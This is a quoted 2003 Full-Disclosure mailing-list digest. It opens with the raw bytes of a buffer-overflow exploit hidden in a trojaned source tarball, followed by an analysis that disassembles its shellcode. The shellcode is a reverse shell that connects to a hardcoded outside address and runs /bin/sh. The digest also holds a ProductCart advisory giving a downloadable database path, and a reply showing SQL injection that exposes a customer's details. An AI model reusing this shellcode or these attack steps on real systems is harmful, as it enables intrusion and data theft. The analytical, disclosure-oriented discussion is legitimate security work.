?!??������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1?1?1?Q??Q??Q??Q��???f?��?1?1?QQh?b??fh????fQ�???SWR��???f?�1?9?t?1????�1???�??�1???�????�1???�????�1?1?Phn/shh//bi�?PS��???�1????� > > > Heh. Boy, did j00 get hax0red! Here's what's actually in that file: > > $0000 - $00ff: 'A' x 256 > $0100 - $011f: DWORD $bffff321 x 8 > $0120 - $0378 $90 = NOP x 600 > $0378 - $03fa: Binary shellcode > $03fb - $03fc: CR, LF > <EOF> > > In other words, it's one very long line. Looks to me like the securecode > program reads each line of the .c file into a buffer that's only 256 bytes > long; this exploit fills it with 'A', then overwrites the return address on > the stack with a pointer into the NOP slide. Here's a disassembly of the > shellcode: note that offset 0 in this disassembly is offset $0370 in the > file. Sorry for not commenting this, but I don't speak linux asm; however I > can see a whole bunch of syscalls going on in there; the values in eax > should tell you whether anything nastier than a few mkdirs was done to > you... > > Z:\sploits-misc\targzip>objdump -D --target=binary > hello-world2.bin --architectu > re=i386 > > hello-world2.bin: file format binary > > objdump: hello-world2.bin: no symbols > Disassembly of section .data: > > 00000000 <.data>: > 0: 90 nop > 1: 90 nop > 2: 90 nop > 3: 90 nop > 4: 90 nop > 5: 90 nop > 6: 90 nop > 7: 90 nop > 8: 90 nop > 9: 31 c0 xor %eax,%eax > b: 31 db xor %ebx,%ebx > d: 31 c9 xor %ecx,%ecx > f: 51 push %ecx > 10: b1 06 mov $0x6,%cl > 12: 51 push %ecx > 13: b1 01 mov $0x1,%cl > 15: 51 push %ecx > 16: b1 02 mov $0x2,%cl > 18: 51 push %ecx > 19: 89 e1 mov %esp,%ecx > 1b: b3 01 mov $0x1,%bl > 1d: b0 66 mov $0x66,%al > 1f: cd 80 int $0x80 > 21: 89 c2 mov %eax,%edx > 23: 31 c0 xor %eax,%eax > 25: 31 c9 xor %ecx,%ecx > 27: 51 push %ecx > 28: 51 push %ecx > 29: 68 d4 62 f7 cc push $0xccf762d4 > 2e: 66 68 b0 ef pushw $0xefb0 > 32: b1 02 mov $0x2,%cl > 34: 66 51 push %cx > 36: 89 e7 mov %esp,%edi > 38: b3 10 mov $0x10,%bl > 3a: 53 push %ebx > 3b: 57 push %edi > 3c: 52 push %edx > 3d: 89 e1 mov %esp,%ecx > 3f: b3 03 mov $0x3,%bl > 41: b0 66 mov $0x66,%al > 43: cd 80 int $0x80 > 45: 31 c9 xor %ecx,%ecx > 47: 39 c1 cmp %eax,%ecx > 49: 74 06 je 0x51 > 4b: 31 c0 xor %eax,%eax > 4d: b0 01 mov $0x1,%al > 4f: cd 80 int $0x80 > 51: 31 c0 xor %eax,%eax > 53: b0 3f mov $0x3f,%al > 55: 89 d3 mov %edx,%ebx > 57: cd 80 int $0x80 > 59: 31 c0 xor %eax,%eax > 5b: b0 3f mov $0x3f,%al > 5d: 89 d3 mov %edx,%ebx > 5f: b1 01 mov $0x1,%cl > 61: cd 80 int $0x80 > 63: 31 c0 xor %eax,%eax > 65: b0 3f mov $0x3f,%al > 67: 89 d3 mov %edx,%ebx > 69: b1 02 mov $0x2,%cl > 6b: cd 80 int $0x80 > 6d: 31 c0 xor %eax,%eax > 6f: 31 d2 xor %edx,%edx > 71: 50 push %eax > 72: 68 6e 2f 73 68 push $0x68732f6e > 77: 68 2f 2f 62 69 push $0x69622f2f > 7c: 89 e3 mov %esp,%ebx > 7e: 50 push %eax > 7f: 53 push %ebx > 80: 89 e1 mov %esp,%ecx > 82: b0 0b mov $0xb,%al > 84: cd 80 int $0x80 > 86: 31 c0 xor %eax,%eax > 88: b0 01 mov $0x1,%al > 8a: cd 80 int $0x80 > 8c: 0d .byte 0xd > 8d: 0a .byte 0xa > > > > DaveK > > _________________________________________________________________ > Sign-up for a FREE BT Broadband connection today! > http://www.msn.co.uk/specials/btbroadband > > > --__--__-- > > Message: 8 > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT) > From: "Larry W. Cashdollar" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file > can be downloaded remotely > > > > 949 is a legit zip code in cali. > > > On Sat, 5 Jul 2003, KF wrote: > > > Was that legit California data? I am sure than making someone have a > > nice weekend you just made multiple someones have a shitty month ahead > > of them... > > http://www.theregister.co.uk/content/55/31509.html > > > > -KF > > > > gyrniff wrote: > > > > >URL: > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > > >Change the name Paul to Paul' > > > > > >Microsoft OLE DB Provider for ODBC Drivers > > > error '80040e14' > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004', > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 > > > > > >have a nice weekend ;-) > > > > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > > > > > > >>ProductCart database file can be downloaded remotely > > >>================================================= > > >> > > >>PROGRAM: ProductCart > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/ > > >>VULNERABLE VERSIONS: 1.0 to 2.0 > > >>RISK: High > > >> > > >> > > >>DESCRIPTION > > >>================================================= > > >> > > >>ProductCart� is an ASP shopping cart that combines sophisticated > > >>ecommerce features with time-saving store management tools and remarkable > > >>ease of use. It is widely used by many e-commerce sites. > > >> > > >>DETAILS > > >>================================================= > > >> > > >>In the default installation, product cart database file is located at > > >>/productcart/database/EIPC.mdb which can be accessed easily > > >>by any remote attackers. > > >> > > >>Sample: http://victimhost/productcart/database/EIPC.mdb > > >> > > >>The database file includes the store administration password as well as > > >>customer's info (including credit card info). > > >> > > >> > > >> WORKAROUND > > >>================================================= > > >> > > >>Rename the database file, put it in a protected directory. > > >> > > >> > > >>CREDITS > > >>================================================= > > >> > > >>Discovered by Tri Huynh from Sentry Union > > >> > > >> > > >>DISLAIMER > > >>================================================= > > >> > > >>The information within this paper may change without notice. Use of > > >>this information constitutes acceptance for use in an AS IS condition. > > >>There are NO warranties with regard to this information. In no event > > >>shall the author be liable for any damages whatsoever arising out of > > >>or in connection with the use or spread of this information. Any use > > >>of this information is at the user's own risk. > > >> > > >> > > >>FEEDBACK > > >>================================================= > > >> > > >>Please send suggestions, updates, and comments to: [EMAIL PROTECTED] > > >> > > >> > > > > > >_______________________________________________ > > >Full-Disclosure - We believe in it. > > >Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > --__--__-- > > Message: 9 > From: "Kristian Hermansen" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again ) > Date: Tue, 1 Jul 2003 22:49:59 -0400 > > Yes, programmers should be trained to write better code...but it is more > profitiable to allow sloppy code and a simple fix later (behind the scenes > with vendor notification). This is MS point-of-view. This is why they want > vendor notification, rather than public notification. Again, I say let the > 0-days fly. > > Did you know that certain US government agencies have teams that their only > job is to break software? This has been going on since the 1970's. It > helps to produce secure code in mission critical applications that the > military needs. I am not saying that MS needs to be SO drastic...but a > small team for their MOST popular products would sure be wise to start with. > Why not hire fucking intern teenagers from russia to "Crash Test" their > development projects (facetious)? Would it be so difficult/expensive to > hire some of the main companies that are breaking your software??? > > Kris Hermansen > > ----- Original Message ----- > From: "Schmehl, Paul L" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Tuesday, July 01, 2003 6:58 PM > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again ) > > > > > -----Original Message----- > > > From: Kristian Hermansen [mailto:[EMAIL PROTECTED] > > > Sent: Tuesday, July 01, 2003 3:09 PM > > > To: [EMAIL PROTECTED] > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again ) > > > > > > > > > I agree. It is not our problem. The reason is this. > > > Microsoft would like to reduce costs. Fixing bugs in > > > products costs money, and 0-day bugs need immediate fixes > > > which slow down MS total output ability. They would like to > > > see everyone reporting to the vendor first because this saves > > > them money!!! In this respect, this also allows them to go on > > > writing sloppy code in order to save a few bucks on every > > > product, thus reducing their overhead. I don't want sloppy > > > code. Let the 0-days fly....maybe MS will start doing > > > extensive testing to their products before they release it > > > for sale to millions of customers. I thought .NET was > > > supposed to fix all this ;-P > > > > That's too funny. Microsoft ran a "buffer overflow finder" against the > > codebase for XP, and the VP in charge announced publicly that they had > > "eliminated buffer overflows in XP". Within thirty days, eEye announced > > the UPnP vulnerability in SSDP, which is the single most devastating > > hole ever found in MS products. (You can compromise an entire network > > of XP machines with one attack, simultaneously.) > > > > You don't fix code by extensive testing. You fix it by teaching how to > > write secure code to begin with *and* by ongoing, consistent audits done > > before code is released. (OpenBSD has been doing this for years, and > > look at the results.) > > > > Paul Schmehl ([EMAIL PROTECTED]) > > Adjunct Information Security Officer > > The University of Texas at Dallas > > AVIEN Founding Member > > http://www.utdallas.edu/~pauls/ > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > --__--__-- > > _______________________________________________ > Full-Disclosure mailing list > [EMAIL PROTECTED] > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > End of Full-Disclosure Digest -- Markus Nielsen <[EMAIL PROTECTED]>
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
